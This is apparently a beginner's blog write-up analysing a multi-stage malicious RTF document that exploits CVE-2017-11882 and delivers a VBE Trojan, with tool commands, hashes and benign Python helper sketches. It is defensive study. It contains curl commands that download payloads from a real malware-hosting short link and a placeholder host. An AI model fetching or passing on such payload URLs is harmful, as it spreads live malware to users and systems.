Analysing a malware sample
After learning the basics of malware analysis, I decided to challenge myself by analyzing a real-world sample. I picked a recent upload from Malware Bazaar, which had no tags at the time. My objective was to identify what type of malware it was and understand its behavior.
This is the sample:
https://bazaar.abuse.ch/sample/613b4de5c0a4a0efc484e93eff8281250787bbe45e0652754eee9cbf1186cebb/
Remember to perform malware analysis in a safe environment.
Initial Inspection
The file under analysis had a .doc extension, suggesting it was a Microsoft Word document. To extract metadata, I ran: olemeta sample.doc. However, this threw an exception: not an OLE2 structured storage file, meaning the file wasn't a legacy (OLE2) Word document despite its extension.
Using Detect It Easy (DIE), I found that the file was actually an archive. After extracting its contents, I discovered it was an RTF (Rich Text Format) file, which I could also inspect in VS Code.
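
A quick way to sanity-check an extension is to look at the file's first bytes. The Python sketch below compares a header against three well-known signatures: OLE2 compound files, ZIP archives (which include OOXML formats such as .docx), and RTF. The function names and labels are hypothetical, and a tool like DIE inspects far more than a few leading bytes, so treat this as an illustration rather than a replacement.

```python
# Well-known leading bytes ("magic numbers") for the formats discussed here.
SIGNATURES = [
    (bytes.fromhex("D0CF11E0A1B11AE1"), "ole2"),  # legacy .doc/.xls/.ppt
    (b"PK\x03\x04", "zip"),                       # ZIP, including OOXML (.docx)
    (b"{\\rt", "rtf"),                            # RTF starts with "{\rt"
]


def identify(header: bytes) -> str:
    """Return a coarse file type based on the first bytes of a file."""
    for magic, label in SIGNATURES:
        if header.startswith(magic):
            return label
    return "unknown"


def identify_file(path: str) -> str:
    """Read only the first 8 bytes; the sample is never opened by Office."""
    with open(path, "rb") as handle:
        return identify(handle.read(8))
```

Calling identify_file("sample.doc") on a file that is really a ZIP archive would return "zip" regardless of the .doc extension.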

Next, I used oleid to check for embedded objects: oleid sample.doc. The results revealed an external relationship within the document. oleobj returned an object name and an external link, likely leading to a second-stage payload.
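
To illustrate what an external relationship looks like, here is a minimal Python sketch. It assumes the sample is an OOXML package (a ZIP archive), which is my reading of the DIE and oleid results rather than something confirmed above. In such a package, relationships live in .rels parts, and an external one carries TargetMode="External". The function name is hypothetical, and this is not how oleid or oleobj are implemented.

```python
import zipfile
import xml.etree.ElementTree as ET

# XML namespace used by OOXML package relationship parts (*.rels).
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_targets(source):
    """Return (part name, relationship type, target) for external relationships.

    `source` is a path or a binary file-like object holding a ZIP package.
    Note: for untrusted XML, a hardened parser such as defusedxml is safer
    than the standard library parser used here.
    """
    found = []
    with zipfile.ZipFile(source) as package:
        for name in package.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(package.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Type"), rel.get("Target")))
    return found
```

Running external_targets("sample.doc") would list each external link together with the part that declares it, which is the kind of URL worth fetching next in an isolated environment.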

I attempted to retrieve the linked payload with curl. The first request, curl --output file_2.rtf https://agr.my/X7TO8b, returned a redirect, so I followed it to get the actual file: curl --output file_2.rtf <redirected_url>.
Then, I uploaded the document to Hybrid Analysis, which identified CVE-2017-11882 as the exploit used.
https://www.hybrid-analysis.com/sample/5754ec2b05c1020060297b2b9b717e6d8ec01703d43e53dec323762d7b1b38da/67ead51d92d9e3292808211e
sha256: 5754ec2b05c1020060297b2b9b717e6d8ec01703d43e53dec323762d7b1b38da
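
Sandbox reports are keyed by the file's SHA-256, so it is worth confirming that the local copy matches the hash in the report. A minimal Python sketch (the function name is hypothetical) that hashes a file in chunks without loading it all into memory:

```python
import hashlib


def sha256_of(path: str, chunk_size: int = 65536) -> str:
    """Return the hex SHA-256 digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        # iter() with a sentinel keeps reading until read() returns b"".
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

For example, sha256_of("file_2.rtf") can be compared against the sha256 value listed with the report.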
CVE-2017-11882 is a vulnerability in Microsoft Equation Editor that allows attackers to execute arbitrary code when a malicious document is opened.

Extracting the Payload from RTF
Since the second-stage file contained executable code, I needed to extract it. While researching, I found an article describing a similar case.
Following its guidance, I extracted the payload using:
rtfdump.py -F -s 1 -d ./example/file_2.rtf | oledump.py -s 1 -d > out.txt
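
For intuition about what such an extraction involves: RTF stores embedded objects as hexadecimal text inside an \objdata group, so the first step is turning that text back into bytes. The Python sketch below is a deliberately naive version of that step, with a hypothetical function name. It assumes the hex digits are interrupted only by whitespace, which obfuscated samples often violate, so rtfdump.py remains the right tool for real files.

```python
import re


def decode_objdata(rtf_text: str) -> list:
    """Hex-decode the contents of each \\objdata group (naive approach)."""
    blobs = []
    # Capture everything after \objdata up to the next brace.
    for match in re.finditer(r"\\objdata(?![a-z])([^{}]*)", rtf_text):
        # Keep only hex digits; this drops spaces and line breaks.
        hex_digits = re.sub(r"[^0-9A-Fa-f]", "", match.group(1))
        if len(hex_digits) % 2:
            hex_digits = hex_digits[:-1]  # ignore a dangling half-byte
        blobs.append(bytes.fromhex(hex_digits))
    return blobs
```

On a benign test string, a class name such as Equation.3 (the Equation Editor ProgID) becomes readable in the decoded bytes. Malicious documents may alter or hide it, so its absence proves nothing.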

Analyzing the Third-Stage Payload
The extracted payload was an obfuscated file. To analyze it, I used scdbg, a shellcode emulator that runs shellcode in a controlled environment and logs what it does. I ran it with two options:
-r: report mode, to log execution behavior,
-findsc: findsc mode, to locate embedded shellcode.

I then downloaded the next-stage file, a .vbe script:
curl --output malicious.vbe badurl/vbe
I also used Cutter, an open-source reverse engineering platform, to analyze the shellcode. The code appears to manipulate byte order or reverse a string to decode data, and then load .NET assembly bytecode directly into memory.
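
To make the string-reversal idea concrete, here is a small Python sketch of one common pattern: the payload is stored as reversed Base64 text and turned back into a binary at run time. The Base64 step is purely my assumption for illustration and was not confirmed for this sample, and both function names are hypothetical.

```python
import base64


def decode_reversed_base64(blob: str) -> bytes:
    """Reverse the text, then Base64-decode it (both steps are assumptions)."""
    return base64.b64decode(blob[::-1])


def looks_like_pe(data: bytes) -> bool:
    """PE files, including .NET assemblies, begin with the bytes 'MZ'."""
    return data[:2] == b"MZ"
```

If a decoded blob passes looks_like_pe, it is worth saving to disk and inspecting as an executable rather than as a script.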
From here, the analysis becomes more complex because the payload needs to be deobfuscated.
I uploaded malicious.vbe to Hybrid Analysis, which classified it as a Trojan: https://www.hybrid-analysis.com/sample/42e843cba5acfcc113932267d0bf11fbf973a474f40ae473d32a49243e7fc93d
Conclusion
This was my first hands-on malware analysis experience, and it helped me understand:
- How malicious documents use external relationships to fetch additional payloads,
- The exploitation of CVE-2017-11882 in RTF-based attacks,
- Techniques for extracting embedded payloads from document files,
- How multi-stage malware works, leading to Trojan infections.
Resources
- How to Analyze Malicious Microsoft Office Files
- How RTF malware evades static signature-based detection
- https://github.com/romeomallavo/Malware-Analysis-RTF-Document-Lab
- https://bufferzonesecurity.com/the-beginners-guide-to-rtf-malware-reverse-engineering-part-1/
- https://foxptr.medium.com/analyzing-rtf-documents-5bb45071adfd
